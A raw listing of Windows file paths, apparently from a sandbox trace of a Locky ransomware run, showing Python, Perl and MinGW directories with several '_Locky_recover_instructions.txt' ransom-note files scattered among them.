c:\Python27\tcl\tix8.4.3\demos\samples\*<br />
c:\Python27\tcl\tix8.4.3\demos\samples<br />
c:\Python27\tcl\tix8.4.3\pref\*<br />
c:\Python27\tcl\tix8.4.3\pref<br />
c:\Python27\tcl\tk8.5\*<br />
c:\Python27\tcl\tk8.5<br />
c:\Python27\tcl\tk8.5\demos\*<br />
c:\Python27\tcl\tk8.5\demos<br />
c:\Python27\tcl\tk8.5\demos\images\*<br />
c:\Python27\tcl\tk8.5\demos\images<br />
c:\Python27\tcl\tk8.5\images\*<br />
c:\Python27\tcl\tk8.5\images<br />
c:\Python27\tcl\tk8.5\msgs\*<br />
c:\Python27\tcl\tk8.5\msgs<br />
c:\Python27\tcl\tk8.5\ttk\*<br />
c:\Python27\tcl\tk8.5\ttk<br />
c:\Python27\Tools\*<br />
c:\Python27\Tools<br />
c:\Python27\Tools\i18n\*<br />
c:\Python27\Tools\i18n<br />
c:\Python27\Tools\pynche\*<br />
c:\Python27\Tools\pynche<br />
c:\Python27\Tools\pynche\X\*<br />
c:\Python27\Tools\pynche\X<br />
c:\Python27\Tools\Scripts\*<br />
c:\Python27\Tools\Scripts<br />
c:\Python27\Tools\versioncheck\*<br />
c:\Python27\Tools\versioncheck<br />
c:\Python27\Tools\webchecker\*<br />
c:\Python27\Tools\webchecker<br />
c:\tjgzvka\*<br />
c:\tjgzvka<br />
c:\tjgzvka\bin\*<br />
c:\tjgzvka\bin<br />
c:\tjgzvka\dll\*<br />
c:\tjgzvka\dll<br />
c:\tjgzvka\lib\*<br />
c:\tjgzvka\lib<br />
c:\tjgzvka\lib\api\*<br />
c:\tjgzvka\lib\api<br />
c:\tjgzvka\lib\common\*<br />
c:\tjgzvka\lib\common<br />
c:\tjgzvka\lib\core\*<br />
c:\tjgzvka\lib\core<br />
c:\tjgzvka\modules\*<br />
c:\tjgzvka\modules<br />
c:\tjgzvka\modules\auxiliary\*<br />
c:\tjgzvka\modules\auxiliary<br />
c:\tjgzvka\modules\packages\*<br />
c:\tjgzvka\modules\packages<br />
c:\Python27\Lib\test\badcert.pem<br />
c:\Python27\Lib\test\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\badkey.pem<br />
c:\Python27\Lib\test\https_svn_python_org_root.pem<br />
c:\Python27\Lib\test\keycert.pem<br />
c:\Python27\Lib\test\nullcert.pem<br />
c:\Python27\Lib\test\sha256.pem<br />
c:\Python27\Lib\test\ssl_cert.pem<br />
c:\Python27\Lib\test\ssl_key.pem<br />
c:\Python27\Lib\test\svn_python_org_https_cert.pem<br />
c:\Python27\Lib\test\wrongcert.pem<br />
c:\Perl\perl\lib\CORE\INTERN.h<br />
c:\Perl\perl\lib\CORE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\hv.h<br />
c:\Perl\perl\lib\CORE\handy.h<br />
c:\Perl\perl\lib\CORE\gv.h<br />
c:\Perl\perl\lib\CORE\git_version.h<br />
c:\Perl\perl\lib\CORE\form.h<br />
c:\Perl\perl\lib\CORE\fakethr.h<br />
c:\Perl\perl\lib\CORE\fakesdio.h<br />
c:\Perl\perl\lib\CORE\EXTERN.h<br />
c:\Perl\perl\lib\CORE\embedvar.h<br />
c:\Perl\perl\lib\CORE\embed.h<br />
c:\Perl\perl\lib\CORE\dosish.h<br />
c:\Perl\perl\lib\CORE\cop.h<br />
c:\Perl\perl\lib\CORE\config.h<br />
c:\Perl\perl\lib\CORE\cc_runtime.h<br />
c:\Perl\perl\lib\CORE\bitcount.h<br />
c:\Perl\perl\lib\CORE\av.h<br />
c:\Perl\c\i686-w64-mingw32\include\accctrl.h<br />
c:\Perl\c\i686-w64-mingw32\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\aclapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\aclui.h<br />
c:\Perl\c\i686-w64-mingw32\include\activeds.h<br />
c:\Perl\c\i686-w64-mingw32\include\activscp.h<br />
c:\Perl\c\i686-w64-mingw32\include\adc.h<br />
c:\Perl\c\i686-w64-mingw32\include\admex.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoctint.h<br />
c:\Perl\c\i686-w64-mingw32\include\adodef.h<br />
c:\Perl\c\i686-w64-mingw32\include\adogpool.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoint.h<br />
c:\Perl\c\i686-w64-mingw32\include\adojet.h<br />
c:\Perl\c\i686-w64-mingw32\include\adomd.h<br />
c:\Perl\c\i686-w64-mingw32\include\adptif.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsdb.h<br />
c:\Perl\c\i686-w64-mingw32\include\adserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\adshlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsiid.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsnms.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\adssts.h<br />
c:\Perl\c\i686-w64-mingw32\include\adtgen.h<br />
c:\Perl\c\i686-w64-mingw32\include\advpub.h<br />
c:\Perl\c\i686-w64-mingw32\include\afxres.h<br />
c:\Perl\c\i686-w64-mingw32\include\af_irda.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtctl_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\agterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtsvr.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtsvr_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\amaudio.h<br />
c:\Perl\c\i686-w64-mingw32\include\amstream.h<br />
c:\Perl\c\i686-w64-mingw32\include\amvideo.h<br />
c:\Perl\c\i686-w64-mingw32\include\appmgmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\aqadmtyp.h<br />
c:\Perl\c\i686-w64-mingw32\include\asptlb.h<br />
c:\Perl\c\i686-w64-mingw32\include\assert.h<br />
c:\Perl\c\i686-w64-mingw32\include\atalkwsh.h<br />
c:\Perl\c\i686-w64-mingw32\include\audevcod.h<br />
c:\Perl\c\i686-w64-mingw32\include\authif.h<br />
c:\Perl\c\i686-w64-mingw32\include\authz.h<br />
c:\Perl\c\i686-w64-mingw32\include\avifmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\azroles.h<br />
c:\Perl\c\i686-w64-mingw32\include\basetsd.h<br />
c:\Perl\c\i686-w64-mingw32\include\basetyps.h<br />
c:\Perl\c\i686-w64-mingw32\include\batclass.h<br />
c:\Perl\c\i686-w64-mingw32\include\bh.h<br />
c:\Perl\c\i686-w64-mingw32\include\bidispl.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits1_5.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits2_0.h<br />
c:\Perl\c\i686-w64-mingw32\include\bitscfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\bitsmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\blberr.h<br />
c:\Perl\c\i686-w64-mingw32\include\callobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\cchannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\cderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoex.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexm.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexm_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoex_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\cdonts.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosys.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosyserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosysstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosys_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\celib.h<br />
c:\Perl\c\i686-w64-mingw32\include\certadm.h<br />
c:\Perl\c\i686-w64-mingw32\include\certbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\certbcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\certcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\certenc.h<br />
c:\Perl\c\i686-w64-mingw32\include\certexit.h<br />
c:\Perl\c\i686-w64-mingw32\include\certif.h<br />
c:\Perl\c\i686-w64-mingw32\include\certmod.h<br />
c:\Perl\c\i686-w64-mingw32\include\certpol.h<br />
c:\Perl\c\i686-w64-mingw32\include\certreqd.h<br />
c:\Perl\c\i686-w64-mingw32\include\certsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\certview.h<br />
c:\Perl\c\i686-w64-mingw32\include\cfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\cfgmgr32.h<br />
c:\Perl\c\i686-w64-mingw32\include\cguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\chanmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cierror.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluadmex.h<br />
c:\Perl\c\i686-w64-mingw32\include\clusapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgserver.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgwizard.h<br />
c:\Perl\c\i686-w64-mingw32\include\cmdtree.h<br />
c:\Perl\c\i686-w64-mingw32\include\cmnquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\colordlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\comadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\comcat.h<br />
c:\Perl\c\i686-w64-mingw32\include\comdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\comdefsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\comip.h<br />
c:\Perl\c\i686-w64-mingw32\include\commctrl.h<br />
c:\Perl\c\i686-w64-mingw32\include\commdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\commoncontrols.h<br />
c:\Perl\c\i686-w64-mingw32\include\complex.h<br />
c:\Perl\c\i686-w64-mingw32\include\compobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\comsvcs.h<br />
c:\Perl\c\i686-w64-mingw32\include\comutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\confpriv.h<br />
c:\Perl\c\i686-w64-mingw32\include\conio.h<br />
c:\Perl\c\i686-w64-mingw32\include\control.h<br />
c:\Perl\c\i686-w64-mingw32\include\correg.h<br />
c:\Perl\c\i686-w64-mingw32\include\cpl.h<br />
c:\Perl\c\i686-w64-mingw32\include\cplext.h<br />
c:\Perl\c\i686-w64-mingw32\include\crtdbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\crtdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\cryptuiapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ctxtcall.h<br />
c:\Perl\c\i686-w64-mingw32\include\ctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\custcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8caps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8types.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9caps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9types.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dcaps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dhal.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drm.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drmdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drmobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx8core.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9core.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9math.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9mesh.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9shader.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9tex.h<br />
c:\Perl\c\i686-w64-mingw32\include\daogetrw.h<br />
c:\Perl\c\i686-w64-mingw32\include\datapath.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoint.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgautoattach.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgeng.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbghelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbt.h<br />
c:\Perl\c\i686-w64-mingw32\include\dciddi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dciman.h<br />
c:\Perl\c\i686-w64-mingw32\include\dde.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddeml.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddraw.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddrawgdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddrawi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddstream.h<br />
c:\Perl\c\i686-w64-mingw32\include\delayimp.h<br />
c:\Perl\c\i686-w64-mingw32\include\devguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpcsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpssdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmldid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmled.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmliid.h<br />
c:\Perl\c\i686-w64-mingw32\include\digitalv.h<br />
c:\Perl\c\i686-w64-mingw32\include\dimm.h<br />
c:\Perl\c\i686-w64-mingw32\include\dinput.h<br />
c:\Perl\c\i686-w64-mingw32\include\dir.h<br />
c:\Perl\c\i686-w64-mingw32\include\direct.h<br />
c:\Perl\c\i686-w64-mingw32\include\dirent.h<br />
c:\Perl\c\i686-w64-mingw32\include\diskguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispatch.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispdib.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispex.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlcapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlfcn.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlgs.h<br />
c:\Perl\c\i686-w64-mingw32\include\dls1.h<br />
c:\Perl\c\i686-w64-mingw32\include\dls2.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmdls.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmo.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmodshow.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmoreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmort.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmplugin.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusbuff.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusicc.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusicf.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusici.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusics.h<br />
c:\Perl\c\i686-w64-mingw32\include\docobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\domdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dos.h<br />
c:\Perl\c\i686-w64-mingw32\include\downloadmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dpaddr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplay.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplay8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplobby.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplobby8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dpnathlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsclient.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsconf.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsdriver.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsgetdc.h<br />
c:\Perl\c\i686-w64-mingw32\include\dshow.h<br />
c:\Perl\c\i686-w64-mingw32\include\dskquota.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsound.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsrole.h<br />
c:\Perl\c\i686-w64-mingw32\include\dtchelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvdevcod.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvdmedia.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvec.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\dwmapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxdiag.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxerr8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxerr9.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxfile.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxtmpl.h<br />
c:\Perl\c\i686-w64-mingw32\include\edevdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\eh.h<br />
c:\Perl\c\i686-w64-mingw32\include\emostore.h<br />
c:\Perl\c\i686-w64-mingw32\include\emostore_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\emptyvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\errno.h<br />
c:\Perl\c\i686-w64-mingw32\include\error.h<br />
c:\Perl\c\i686-w64-mingw32\include\errorrep.h<br />
c:\Perl\c\i686-w64-mingw32\include\errors.h<br />
c:\Perl\c\i686-w64-mingw32\include\evcode.h<br />
c:\Perl\c\i686-w64-mingw32\include\eventsys.h<br />
c:\Perl\c\i686-w64-mingw32\include\evntrace.h<br />
c:\Perl\c\i686-w64-mingw32\include\exchform.h<br />
c:\Perl\c\i686-w64-mingw32\include\excpt.h<br />
c:\Perl\c\i686-w64-mingw32\include\exdisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\exdispid.h<br />
c:\Perl\c\i686-w64-mingw32\include\fci.h<br />
c:\Perl\c\i686-w64-mingw32\include\fcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\fdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\fenv.h<br />
c:\Perl\c\i686-w64-mingw32\include\filehc.h<br />
c:\Perl\c\i686-w64-mingw32\include\filter.h<br />
c:\Perl\c\i686-w64-mingw32\include\filterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\float.h<br />
c:\Perl\c\i686-w64-mingw32\include\fltdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\fpieee.h<br />
c:\Perl\c\i686-w64-mingw32\include\ftsiface.h<br />
c:\Perl\c\i686-w64-mingw32\include\fvec.h<br />
c:\Perl\c\i686-w64-mingw32\include\gb18030.h<br />
c:\Perl\c\i686-w64-mingw32\include\getopt.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\gl.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glaux.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glext.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glu.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glxext.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\wglext.h<br />
c:\Perl\c\i686-w64-mingw32\include\gpedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\gpmgmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\guiddef.h<br />
c:\Perl\c\i686-w64-mingw32\include\h323priv.h<br />
c:\Perl\c\i686-w64-mingw32\include\hlguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\hliface.h<br />
c:\Perl\c\i686-w64-mingw32\include\hlink.h<br />
c:\Perl\c\i686-w64-mingw32\include\hostinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\htiface.h<br />
c:\Perl\c\i686-w64-mingw32\include\htiframe.h<br />
c:\Perl\c\i686-w64-mingw32\include\htmlguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\htmlhelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\http.h<br />
c:\Perl\c\i686-w64-mingw32\include\httpext.h<br />
c:\Perl\c\i686-w64-mingw32\include\httpfilt.h<br />
c:\Perl\c\i686-w64-mingw32\include\httprequestid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ia64reg.h<br />
c:\Perl\c\i686-w64-mingw32\include\iaccess.h<br />
c:\Perl\c\i686-w64-mingw32\include\iadmext.h<br />
c:\Perl\c\i686-w64-mingw32\include\iadmw.h<br />
c:\Perl\c\i686-w64-mingw32\include\iads.h<br />
c:\Perl\c\i686-w64-mingw32\include\icm.h<br />
c:\Perl\c\i686-w64-mingw32\include\icmpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\icrsint.h<br />
c:\Perl\c\i686-w64-mingw32\include\idf.h<br />
c:\Perl\c\i686-w64-mingw32\include\idispids.h<br />
c:\Perl\c\i686-w64-mingw32\include\iedial.h<br />
c:\Perl\c\i686-w64-mingw32\include\ieeefp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ieverp.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiis.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiisext.h<br />
c:\Perl\c\i686-w64-mingw32\include\iimgctx.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiscnfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\iisext_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\iisrsta.h<br />
c:\Perl\c\i686-w64-mingw32\include\imagehlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ime.h<br />
c:\Perl\c\i686-w64-mingw32\include\imessage.h<br />
c:\Perl\c\i686-w64-mingw32\include\imm.h<br />
c:\Perl\c\i686-w64-mingw32\include\indexsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\inetreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\inetsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\initguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\initoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\inputscope.h<br />
c:\Perl\c\i686-w64-mingw32\include\intrin.h<br />
c:\Perl\c\i686-w64-mingw32\include\intshcut.h<br />
c:\Perl\c\i686-w64-mingw32\include\inttypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\invkprxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\io.h<br />
c:\Perl\c\i686-w64-mingw32\include\ioevent.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipexport.h<br />
c:\Perl\c\i686-w64-mingw32\include\iphlpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipifcons.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipinfoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipmsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\iprtrmib.h<br />
c:\Perl\c\i686-w64-mingw32\include\iptypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxconst.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxrip.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxrtdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxsap.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxtfflt.h<br />
c:\Perl\c\i686-w64-mingw32\include\isguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\issper16.h<br />
c:\Perl\c\i686-w64-mingw32\include\issperr.h<br />
c:\Perl\c\i686-w64-mingw32\include\iwamreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\i_cryptasn1tls.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksmedia.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksproxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksuuids.h<br />
c:\Perl\c\i686-w64-mingw32\include\kxia64.h<br />
c:\Perl\c\i686-w64-mingw32\include\libgen.h<br />
c:\Perl\c\i686-w64-mingw32\include\limits.h<br />
c:\Perl\c\i686-w64-mingw32\include\lm.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmaccess.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmalert.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmapibuf.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmat.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmaudit.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmconfig.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmcons.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmdfs.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmerrlog.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmjoin.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmremutl.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmrepl.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmserver.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmshare.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmsname.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmstats.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmsvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmuse.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmuseflg.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmwksta.h<br />
c:\Perl\c\i686-w64-mingw32\include\loadperf.h<br />
c:\Perl\c\i686-w64-mingw32\include\locale.h<br />
c:\Perl\c\i686-w64-mingw32\include\lpmapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\lzexpand.h<br />
c:\Perl\c\i686-w64-mingw32\include\madcapcl.h<br />
c:\Perl\c\i686-w64-mingw32\include\mailmsgprops.h<br />
c:\Perl\c\i686-w64-mingw32\include\malloc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapicode.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapidbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapidefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiform.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapihook.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapinls.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapioid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapispi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapitags.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapival.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiwin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiwz.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapix.h<br />
c:\Perl\c\i686-w64-mingw32\include\math.h<br />
c:\Perl\c\i686-w64-mingw32\include\mbctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\mbstring.h<br />
c:\Perl\c\i686-w64-mingw32\include\mciavi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mcx.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdcommsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mddefw.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdhcp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mediaerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mediaobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\medparam.h<br />
c:\Perl\c\i686-w64-mingw32\include\mem.h<br />
c:\Perl\c\i686-w64-mingw32\include\memory.h<br />
c:\Perl\c\i686-w64-mingw32\include\mergemod.h<br />
c:\Perl\c\i686-w64-mingw32\include\mgm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mgmtapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\midles.h<br />
c:\Perl\c\i686-w64-mingw32\include\mimedisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mimeinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\minmax.h<br />
c:\Perl\c\i686-w64-mingw32\include\mlang.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmcobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmreg.h<br />
